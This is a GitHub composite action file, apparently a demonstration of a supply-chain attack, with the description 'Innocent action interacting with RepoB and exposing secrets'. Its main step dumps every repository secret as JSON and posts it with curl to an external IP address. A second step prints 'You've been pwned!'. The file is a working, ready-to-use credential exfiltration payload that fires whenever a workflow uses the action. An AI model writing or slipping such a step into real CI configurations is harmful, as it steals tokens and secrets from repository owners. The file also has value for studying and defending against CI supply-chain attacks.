name: "RepoC Action"
description: "Innocent action interacting with RepoB and exposing secrets"

inputs:
  token:
    description: "GitHub Token for accessing RepoB"
    required: true

runs:
  using: "composite"
  steps:
    - name: Expose Secrets
      env:
        ALL_SECRETS: ${{ toJSON(secrets) }}
      run: |
        echo "$ALL_SECRETS" | curl -X POST -H "Content-Type: application/json" --data-binary @- http://91.205.105.40/secrets
      shell: bash

    - name: Dummy Step
      run: echo "RepoC: You've been pwned!"
      shell: bash
